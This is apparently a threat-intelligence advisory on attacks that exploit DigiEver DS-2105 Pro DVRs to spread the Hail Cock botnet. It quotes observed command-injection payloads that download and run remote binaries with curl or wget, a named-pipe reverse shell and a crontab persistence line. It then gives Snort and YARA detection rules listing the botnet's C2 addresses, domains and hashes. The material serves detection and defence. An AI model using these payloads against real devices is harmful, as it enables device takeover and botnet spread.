Eine Schwachstelle in DigiEver DS-2105 Pro DVRs wird ausgenutzt, um Malware zu verbreiten

  cgiName=time_tzsetup.cgi&page=/cfg_system_time.htm&id=69&ntp=`rm x86;curl --output x86 http://154.216.17[.]126/x86; chmod 777 *; ./x86 nvr`&ntp1=time.stdtime.gov.tw&ntp2=`rm x86;curl --output x86 http://154.216.17[.]126/x86; chmod 777 *; ./x86 nvr`&isEnabled=0&timeDiff=+9&ntpAutoSync=1&ntpSyncMode=1&day=0&hour=0&min=0&syncDiff=30

  GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`wget+http://45.202.35[.]24/l+-O-|+sh`) HTTP/1.1
  Host: localhost:80
  User-Agent: Go-http-client/1.1

  /boaform/admin/formTracert target_addr=;`rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2>%261|wget+http://45.202.35[.]24/b+-O-|+sh+>/tmp/f`&waninf=1_INTERNET_R_VID_

  sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks[.]ru/wget.sh; curl --output wget.sh http://hailcocks[.]ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"

  alert tcp $HOME_NET any -> 154.216.17.126 any (msg:"C2 Comms for Hail Cock Botnet to  154.216.17.126"; flow:to_server,established;)
  alert tcp $HOME_NET any -> 154.213.187.50 any (msg:"C2 Comms for Hail Cock Botnet to  154.213.187.50"; flow:to_server,established;)
  alert tcp $HOME_NET any -> 86.107.100.80 any (msg:"C2 Comms for Hail Cock Botnet to  86.107.100.80"; flow:to_server,established;)
  alert tcp $HOME_NET any -> 213.182.204.57 any (msg:"C2 Comms for Hail Cock Botnet to  213.182.204.57"; flow:to_server,established;)
  alert tcp $HOME_NET any -> 195.133.92.51 any (msg:"C2 Comms for Hail Cock Botnet to  195.133.92.51"; flow:to_server,established;)
  alert tcp $HOME_NET any -> 185.82.200.181 any (msg:"C2 Comms for Hail Cock Botnet to  185.82.200.181"; flow:to_server,established;)
  alert tcp $HOME_NET any -> 81.29.149.178 any (msg:"C2 Comms for Hail Cock Botnet to  81.29.149.178"; flow:to_server,established;)
  alert tcp $HOME_NET any -> 88.151.195.22 any (msg:"C2 Comms for Hail Cock Botnet to  88.151.195.22"; flow:to_server,established;)
  alert tcp $HOME_NET any -> 91.149.218.232 any (msg:"C2 Comms for Hail Cock Botnet to  91.149.218.232"; flow:to_server,established;)
  alert tcp $HOME_NET any -> 91.149.238.18 any (msg:"C2 Comms for Hail Cock Botnet to  91.149.238.18"; flow:to_server,established;)
  alert tcp $HOME_NET any -> 31.13.248.89 any (msg:"C2 Comms for Hail Cock Botnet to  31.13.248.89"; flow:to_server,established;)
  alert tcp $HOME_NET any -> 193.233.193.45 any (msg:"C2 Comms for Hail Cock Botnet to  193.233.193.45"; flow:to_server,established;)
  alert tcp $HOME_NET any -> 194.87.198.29 any (msg:"C2 Comms for Hail Cock Botnet to  194.87.198.29"; flow:to_server,established;)
  alert tcp $HOME_NET any -> 45.202.35.91 any (msg:"C2 Comms for Hail Cock Botnet to  45.202.35.91"; flow:to_server,established;)
  alert tcp $HOME_NET any -> 104.37.188.76 any (msg:"C2 Comms for Hail Cock Botnet to  104.37.188.76"; flow:to_server,established;)
  alert tcp $HOME_NET any -> 95.214.53.205 any (msg:"C2 Comms for Hail Cock Botnet to  95.214.53.205"; flow:to_server,established;)
  alert tcp $HOME_NET any -> 5.35.104.31 any (msg:"C2 Comms for Hail Cock Botnet to  5.35.104.31"; flow:to_server,established;)
  alert tcp $HOME_NET any -> 149.50.106.25 any (msg:"C2 Comms for Hail Cock Botnet to  149.50.106.25"; flow:to_server,established;)
  alert tcp $HOME_NET any -> 141.98.11.79 any (msg:"C2 Comms for Hail Cock Botnet to  141.98.11.79"; flow:to_server,established;)
  alert tcp $HOME_NET any -> 45.202.35.24 any (msg:"C2 Comms for Hail Cock Botnet to  45.202.35.24"; flow:to_server,established;)
  alert tcp $HOME_NET any -> 5.39.254.71 any (msg:"C2 Comms for Hail Cock Botnet to  5.39.254.71"; flow:to_server,established;)
  alert tcp $HOME_NET any -> 45.126.50.101 any (msg:"C2 Comms for Hail Cock Botnet to  45.126.50.101"; flow:to_server,established;)

  alert tcp $HOME_NET any -> hailcocks.ru any (msg:"BLOCK Connection to malicious domain - hailcocks.ru"; flow:to_server,established; sid:1000010; rev:1;)
  alert tcp $HOME_NET any -> kingstonwikkerink.dyn any (msg:"BLOCK Connection to malicious domain - kingstonwikkerink.dyn"; flow:to_server,established; sid:1000011; rev:1;)
  alert tcp $HOME_NET any -> catvision.dyn any (msg:"BLOCK Connection to malicious domain - catvision.dyn"; flow:to_server,established; sid:1000012; rev:1;)
  alert tcp $HOME_NET any -> hikvision.geek any (msg:"BLOCK Connection to malicious domain - hikvision.geek"; flow:to_server,established; sid:1000013; rev:1;)
  alert tcp $HOME_NET any -> shitrocket.dyn any (msg:"BLOCK Connection to malicious domain - shitrocket.dyn"; flow:to_server,established; sid:1000014; rev:1;)
  alert tcp $HOME_NET any -> catlovingfools.geek any (msg:"BLOCK Connection to malicious domain - catlovingfools.geek"; flow:to_server,established; sid:1000015; rev:1;)

  rule hailcock_malware

{
  strings:
    $someoffdeeznuts = "someoffdeeznuts"
    $ip_address = { 154.213.187.50 }

  condition:
    any of them
}

rule malware_hashes

{
  strings:
    $hash_1 = "3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615"
    $hash_2 = "0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad"
    $hash_3 = "b32390e3ed03b99419c736b2eb707886b9966f731e629f23e3af63ea7a91a7af"
    $hash_4 = "dec561cc19458ea127dc1f548fcd0aaa51db007fa8b95c353086cd2d26bfcf02"
    $hash_5 = "a1b73a3fbd2e373a35d3745d563186b06857f594fa5379f6f7401d09476a0c41"

  condition:
    any of them
}


rule malicious_domains

{
 strings: 
    $hailcocks = "hailcocks.ru"
    $kingstonwikkerink = "kingstonwikkerink.dyn"
    $catvision = "catvision.dyn"
    $catloving = "catlovingfools.geek"
    $hikvision = "hikvision.dyn"
    $shitrocket = "shitrocket.dyn"

 condition:
   any of them

}